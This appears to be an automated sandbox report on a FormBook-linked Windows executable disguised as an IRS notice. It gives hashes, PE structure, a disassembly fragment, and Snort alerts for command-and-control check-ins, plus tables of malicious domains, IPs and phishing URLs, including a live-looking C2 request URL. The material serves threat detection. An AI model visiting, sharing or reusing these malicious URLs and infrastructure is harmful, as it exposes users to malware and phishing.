34.102.136.180 | current productlist.exe | malicious | www.sprtncloud.com/ehxh/?kRcDUld=jDZLtt80OgXanyHEmbYdEJgkUOPdb6G3dF7i0rWmwIMNdVLCF6oEkmQIY3+hpCU2t1sylqaiSg==&lZ9D=p2JpVPJHKZml3dvp

Domains

Match | Associated Sample Name / URL | Detection | Context
www.aksaystudios.com | IRS Notice Letter.exe | malicious | 147.255.30.94
www.kobumsnetwork.com | IRS Notice Letter.exe | malicious | 104.24.110.68
www.myaarpdentalpln.com | IRS Notice Letter.exe | malicious | 199.59.242.153
ghs.googlehosted.com | PO21010699XYJ.exe | malicious | 216.58.198.51
ghs.googlehosted.com | current productlist.exe | malicious | 216.58.198.51
ghs.googlehosted.com | https://da930.infusion-links.com/api/v1/click/5782635710906368/4861645707411456 | malicious | 172.217.168.83
ghs.googlehosted.com | Rfq 214871_TAWI Catalog.exe | malicious | 172.217.168.83
ghs.googlehosted.com | Copy111.exe | malicious | 172.217.168.83
ghs.googlehosted.com | dhl.exe | malicious | 172.217.168.83
ghs.googlehosted.com | 2021 Additional Agreement.exe | malicious | 172.217.23.147
ghs.googlehosted.com | LETTER OF AUTHORITY 18DEC.xlsx | malicious | 172.217.168.51
ghs.googlehosted.com | AUTHORIZATION LETTER.xlsx | malicious | 172.217.168.51
ghs.googlehosted.com | payment advise.exe | malicious | 172.217.23.147
ghs.googlehosted.com | 28zrX5JJmg.exe | malicious | 172.217.23.147
ghs.googlehosted.com | SN-17-2020.pdf.exe | malicious | 172.217.168.83
ghs.googlehosted.com | at3nJkOFqF.exe | malicious | 216.58.207.51
ghs.googlehosted.com | http://test.kunmiskincare.com/index.php | malicious | 172.217.18.179
ghs.googlehosted.com | http://test.kunmiskincare.com/index.php | malicious | 216.58.208.51
ghs.googlehosted.com | Order Specifications With Ref Breve#T0876B96.exe | malicious | 216.58.207.51
ghs.googlehosted.com | C03N224Hbu.exe | malicious | 172.217.168.83
ghs.googlehosted.com | P.O_ 39134.xlsx | malicious | 172.217.16.179
ghs.googlehosted.com | https://www.im-creator.com/viewer/vbid-2070bf26-abbmfckb | malicious | 216.58.208.51
ghs.googlehosted.com | Order Catalogue Specifications.xlsx | malicious | 172.217.16.179

ASN

Match | Associated Sample Name / URL | Detection | Context
SAKURA-ASAKURAInternetIncJP | 990109.exe | malicious | 153.127.37.14
SAKURA-ASAKURAInternetIncJP | IRS Notice Letter.exe | malicious | 153.126.209.136
SAKURA-ASAKURAInternetIncJP | IRS Notice Letter.exe | malicious | 153.126.209.136
SAKURA-ASAKURAInternetIncJP | https://masayasu-tei.com/aud/?e=asdf.asdf@asdfaf.ch | malicious | 133.242.249.66
SAKURA-ASAKURAInternetIncJP | http://email.dream11.com/ls/click?upn=-2FVqHTfTUDEWkbMg9eJ641oTNHHVv-2BNEd7kw3S9vWk6rjBdhHEtmR-2Bqpn98EeTQRwk2W-2FRgCc4DRXcD3Sazgo6g-3D-3DwN5f_xdiGPX1FBM2-2Fj30yI8xM81rONeCX2EFqJZzxAtGlpdNLpCLrru3gupy-2BesX2XLs6R-2B6-2ByqwzAd7wWbC3Dhiutt5Hiuy9k3SmVB68mC7IAqbPt6CnQnsrmTJrLsLxqmfhlG7e0dAXeL0r1C-2Ft8R8wGojqmcygq6eeXCMZzO3RpFKld2xHRQohd5lxYjVFgw3eNpTHgTNS7HcGMJeWcqYIQLxA0L7U82Qar2ABV-2BWwUkc-3D | malicious | 153.127.214.218
SAKURA-ASAKURAInternetIncJP | http://email.dream11.com/ls/click?upn=-2FVqHTfTUDEWkbMg9eJ641oTNHHVv-2BNEd7kw3S9vWk6reycnAW6HGGjAX6Yk5wrmviSs0AhhH91hdbG5Dv4EBLg-3D-3DXrYN_A0fZpSMQ4nQ7mi7ToUBjohKclx-2FDyYWLXYIxKypBxUUQ7ZoSU86Z46fU6djnkzPtFo0wPA3m2unu-2BIyKDIzaCHWjWDpLN-2B7ev3G-2FAJLbC2hiT7B1caKuI1SxZ0lqvKXJmnyDRmtnWJIA0c17y5aiwmHuHQ0owSJJWUSywamrCBjaRtzIbV2xmZ1h5upIj-2Bks80hiZDN8kCmNrMWbUIKmuw-3D-3D | malicious | 153.127.214.218
SAKURA-ASAKURAInternetIncJP | PO190041.exe | malicious | 153.126.199.188
SAKURA-ASAKURAInternetIncJP | baf6b9fcec491619b45c1dd7db56ad3d.exe | malicious | 153.120.92.156
SAKURA-ASAKURAInternetIncJP | p8LV1eVFyO.exe | malicious | 153.120.92.156
SAKURA-ASAKURAInternetIncJP | qkN4OZWFG6.exe | malicious | 153.127.37.14
SAKURA-ASAKURAInternetIncJP | kvdYhqN3Nh.exe | malicious | 153.127.37.14
SAKURA-ASAKURAInternetIncJP | 8uOajLllk2.exe | malicious | 153.126.210.205
SAKURA-ASAKURAInternetIncJP | IQtvZjIdhN.exe | malicious | 153.120.92.156
SAKURA-ASAKURAInternetIncJP | https://peraichi.com/landing_pages/expergy1 | malicious | 153.120.48.160
SAKURA-ASAKURAInternetIncJP | https://wolusozai.web.app/yuniri-%E9%AB%98%E9%BD%A2%E8%80%85-%E7%84%A1%E6%96%99%E3%82%A4%E3%83%A9%E3%82%B9%E3%83%88.html | malicious | 49.212.229.205
SAKURA-ASAKURAInternetIncJP | 148wWoi8vI.exe | malicious | 153.120.92.156
SAKURA-ASAKURAInternetIncJP | rJz6SePuqu.dll | malicious | 133.242.119.241
SAKURA-ASAKURAInternetIncJP | https://nishimurakoumuten.com/assets/images/wood/outlookexpress/index.php%3Femail= | malicious | 153.120.48.160
SAKURA-ASAKURAInternetIncJP | PI10943.exe | malicious | 153.126.199.188
SAKURA-ASAKURAInternetIncJP | 3yhnaDfaxn.exe | malicious | 153.127.37.14
CLOUDFLARENETUS | SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtf | malicious | 162.159.130.233
CLOUDFLARENETUS | n#U00b0 761.doc | malicious | 162.159.133.233
CLOUDFLARENETUS | SecuriteInfo.com.Variant.Graftor.893032.186.exe | malicious | 104.31.70.209
CLOUDFLARENETUS | imagnpdf0440690129912239vistaprevia02052329503adobeplayer02304293.exe | malicious | 104.23.98.190
CLOUDFLARENETUS | SEA LION LOGISTICS-URGENT QUOTATION.exe | malicious | 23.227.38.74
CLOUDFLARENETUS | R1G9cMpG36BO2Sg.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 099898892.exe | malicious | 23.227.38.74
CLOUDFLARENETUS | Invoice #756-77988-23989646.exe | malicious | 104.27.138.99
CLOUDFLARENETUS | e-card.htm .exe | malicious | 104.27.201.87
CLOUDFLARENETUS | e-card.jpg .exe | malicious | 104.27.201.87
CLOUDFLARENETUS | QyS0Q13lBd.exe | malicious | 104.31.71.209
CLOUDFLARENETUS | SEe64c0h6A.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | b88rKzKJmJ.exe | malicious | 104.28.5.151
CLOUDFLARENETUS | 36bjGck9ps.exe | malicious | 104.28.5.151
CLOUDFLARENETUS | _00AC0000.exe | malicious | 172.67.218.107
CLOUDFLARENETUS | BitTorrent.exe | malicious | 104.18.87.101
CLOUDFLARENETUS | Quotation.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 6hE7zSMErZ.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 24D004A104D4D54034DBCFFC2A4.EXE | malicious | 104.16.173.80
CLOUDFLARENETUS | 60RaZHDpvI.exe | malicious | 104.28.5.151
BODIS-NJUS | mQFXD5FxGT.exe | malicious | 199.59.242.153
BODIS-NJUS | 099898892.exe | malicious | 199.59.242.153
BODIS-NJUS | ZIPEXT#U007e1.EXE | malicious | 199.59.242.153
BODIS-NJUS | 990109.exe | malicious | 199.59.242.153
BODIS-NJUS | SAWR000148651.exe | malicious | 199.59.242.153
BODIS-NJUS | SHIPPING INVOICEpdf.exe | malicious | 199.59.242.153
BODIS-NJUS | https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FR | malicious | 199.59.242.153
BODIS-NJUS | IRS Notice Letter.exe | malicious | 199.59.242.153
BODIS-NJUS | IRS Notice Letter.exe | malicious | 199.59.242.153
BODIS-NJUS | Payment Order Inv.exe | malicious | 199.59.242.153
BODIS-NJUS | h3dFAROdF3.exe | malicious | 199.59.242.153
BODIS-NJUS | kqwqyoFz1C.exe | malicious | 199.59.242.153
BODIS-NJUS | file.exe | malicious | 199.59.242.153
BODIS-NJUS | PByYRsoSNX.exe | malicious | 199.59.242.153
BODIS-NJUS | 3Y690n1UsS.exe | malicious | 199.59.242.153
BODIS-NJUS | Purchase_Order_39563854854.xlsx | malicious | 199.59.242.153
BODIS-NJUS | SOA121520.exe | malicious | 199.59.242.153
BODIS-NJUS | googlechrome_3843.exe | malicious | 199.59.242.153
BODIS-NJUS | cap.exe | malicious | 199.59.242.153
BODIS-NJUS | Order_009.xlsx | malicious | 199.59.242.153

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.479105905973935
TrID:
• Win32 Executable (generic) a (10002005/4) 99.15%
• Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: IRS Notice Letter pdf document.exe
File size: 106496
MD5: 3fc4d64f320d7fae4bb46f6a735ab853
SHA1: b77666ebd649350f21ee41e0e902c9b95e008e3c
SHA256: ec8b3d104a7fc416aab07329a5f0ecab1b7fd181ffbd2d7ac31af51e532add07
SHA512: 7a15f684bda2af29dce7b23c1a0b933c4ad151525c8200c7a43b82a3ac3bb30bed210c172727724300fa96fcf7ed2bedffca9c0e93bcea6f7d56bd21852d4d7e
SSDEEP: 768:Z1eiH1VLA0mvOKGIb5kUCzPyDyAtaMrXBjSMW7gMlNVGih7sZyjYrfLXgCBe57oP:6s1lmOKGIt0zPyDTrR2gwteDANfsO8
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......_.................p...0....................@................

File Icon

Icon Hash: e0c4c26270faec04

Static PE Info

General

Entrypoint: 0x401490
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x5FFB81EA [Sun Jan 10 22:38:34 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 731c57e7140be6290e90c27b6e4da29c

Entrypoint Preview

Instruction
push 004019C8h
call 00007F4F98DED4C3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx-0C8E2B36h], cl
jecxz 00007F4F98DED4F7h
dec edi
movsd
sahf
sar byte ptr [edi+02441594h], 1
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
fcomp dword ptr [edi+525003EAh]
dec edi
inc esp
push ebp
inc ebx
push esp
dec ecx
inc esp
add byte ptr [ecx+00h], al
and byte ptr [eax], cl
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
pop es
fdiv dword ptr [eax]
aas
pop esi
adc ebp, esi
and ecx, dword ptr [esi-48h]
ret
into
fisub word ptr [eax]
fsubr qword ptr [edi-41EC53F5h]
xchg eax, esp
push esp
or bl, byte ptr [ebp-46F775BFh]
jnc 00007F4F98DED542h
pop ss
stosd
cmp edi, dword ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
test byte ptr [eax+eax], al
add byte ptr [ebx+03h], dl
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [edx+edx*2+49h], dl
inc esi
dec ecx
dec esp
inc ecx
push edx
add byte ptr [6E000901h], cl
outsd
outsb
imul esi, dword ptr [edx+65h], 0000006Eh

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x16b940x28.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x5fc.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x118.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x1607c0x17000False0.357687245245data5.86532727168IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .data0x180000x11d40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x1a0000x5fc0x1000False0.15673828125data1.4944441595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x1a3140x2e8data
                                                                          RT_GROUP_ICON0x1a3000x14data
                                                                          RT_VERSION0x1a0f00x210dataEnglishUnited States

                                                                          Imports

                                                                          DLLImport
                                                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaCastObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaI2Var, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaVarLateMemCallLdRf, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaVarSetObj, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaStrComp, __vbaVarLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                          Version Infos

                                                                          DescriptionData
                                                                          Translation0x0409 0x04b0
                                                                          InternalNameklogelig
                                                                          FileVersion2.00
                                                                          CompanyNameSperry
                                                                          ProductNameSperry
                                                                          ProductVersion2.00
                                                                          OriginalFilenameklogelig.exe

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

Network Behavior

Snort IDS Alerts

Timestamp                  Protocol  SID      Message                               Src Port  Dst Port  Source IP        Dest IP
01/11/21-16:24:11.818810   TCP       1201     ATTACK-RESPONSES 403 Forbidden        80        49732     34.102.136.180   192.168.2.4
01/11/21-16:24:32.693470   TCP       1201     ATTACK-RESPONSES 403 Forbidden        80        49734     34.102.136.180   192.168.2.4
01/11/21-16:24:48.117662   TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49735     80        192.168.2.4      172.67.209.95
01/11/21-16:24:48.117662   TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49735     80        192.168.2.4      172.67.209.95
01/11/21-16:24:48.117662   TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49735     80        192.168.2.4      172.67.209.95
01/11/21-16:24:53.322417   TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49736     80        192.168.2.4      34.102.136.180
01/11/21-16:24:53.322417   TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49736     80        192.168.2.4      34.102.136.180
01/11/21-16:24:53.322417   TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49736     80        192.168.2.4      34.102.136.180
01/11/21-16:24:53.460948   TCP       1201     ATTACK-RESPONSES 403 Forbidden        80        49736     34.102.136.180   192.168.2.4
01/11/21-16:25:14.508003   TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49737     80        192.168.2.4      147.255.30.94
01/11/21-16:25:14.508003   TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49737     80        192.168.2.4      147.255.30.94
01/11/21-16:25:14.508003   TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49737     80        192.168.2.4      147.255.30.94
01/11/21-16:25:20.495931   TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49738     80        192.168.2.4      153.126.209.136
01/11/21-16:25:20.495931   TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49738     80        192.168.2.4      153.126.209.136
01/11/21-16:25:20.495931   TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49738     80        192.168.2.4      153.126.209.136
01/11/21-16:25:25.984778   TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49739     80        192.168.2.4      216.58.207.179
01/11/21-16:25:25.984778   TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49739     80        192.168.2.4      216.58.207.179
01/11/21-16:25:25.984778   TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49739     80        192.168.2.4      216.58.207.179
01/11/21-16:25:36.900513   TCP       1201     ATTACK-RESPONSES 403 Forbidden        80        49740     34.102.136.180   192.168.2.4

Network Port Distribution

TCP Packets

Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Jan 11, 2021 16:23:14.375580072 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.563386917 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.563558102 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.564799070 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.758521080 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758580923 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758625031 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758665085 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758698940 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.758702040 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758730888 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.758744001 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758759975 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.758786917 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758820057 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.758835077 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758881092 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758882999 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.758919954 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.758949041 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.759027958 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.946043015 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946077108 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946147919 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.946213007 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.946422100 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946446896 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946468115 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946490049 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946505070 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.946583033 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.946628094 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946654081 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946674109 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946696997 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946721077 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.946799040 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.946938038 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946963072 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.946984053 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.947024107 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.947087049 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:14.947099924 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:14.947187901 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133243084 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133299112 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133335114 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133336067 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133371115 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133378029 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133419991 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133435965 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133441925 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133502960 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133507967 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133548975 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133574963 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133588076 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133613110 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133629084 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133656025 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133667946 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133692980 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133708000 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133737087 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133745909 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133774042 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133785963 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133814096 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133840084 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133867025 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133878946 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133914948 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133924007 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133958101 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.133964062 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.133992910 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134006977 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.134032965 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134046078 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.134073973 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134084940 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.134109974 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134123087 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.134147882 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134160995 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.134202957 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134213924 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.134218931 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134253979 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.134284973 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.134330034 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.323026896 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.323076963 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.323112011 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.323113918 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.323137045 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.323149920 CET  80        49730     198.187.29.67    192.168.2.4
Jan 11, 2021 16:23:15.323164940 CET  49730     80        192.168.2.4      198.187.29.67
Jan 11, 2021 16:23:15.323188066 CET  80        49730     198.187.29.67    192.168.2.4
(only the first rows of the TCP listing are present in this copy of the report; the later connections on ports 49732 to 49740 appear only in the Snort alerts above)

UDP Packets

Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Jan 11, 2021 16:22:40.501429081 CET  51703     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:40.558036089 CET  53        51703     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:41.734980106 CET  65248     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:41.782879114 CET  53        65248     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:43.079816103 CET  53723     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:43.127841949 CET  53        53723     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:44.754998922 CET  64646     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:44.802923918 CET  53        64646     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:48.201880932 CET  65298     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:48.249973059 CET  53        65298     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:50.577884912 CET  59123     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:50.634222984 CET  53        59123     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:51.736870050 CET  54531     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:51.784784079 CET  53        54531     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:52.901640892 CET  49714     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:52.952630043 CET  53        49714     8.8.8.8          192.168.2.4
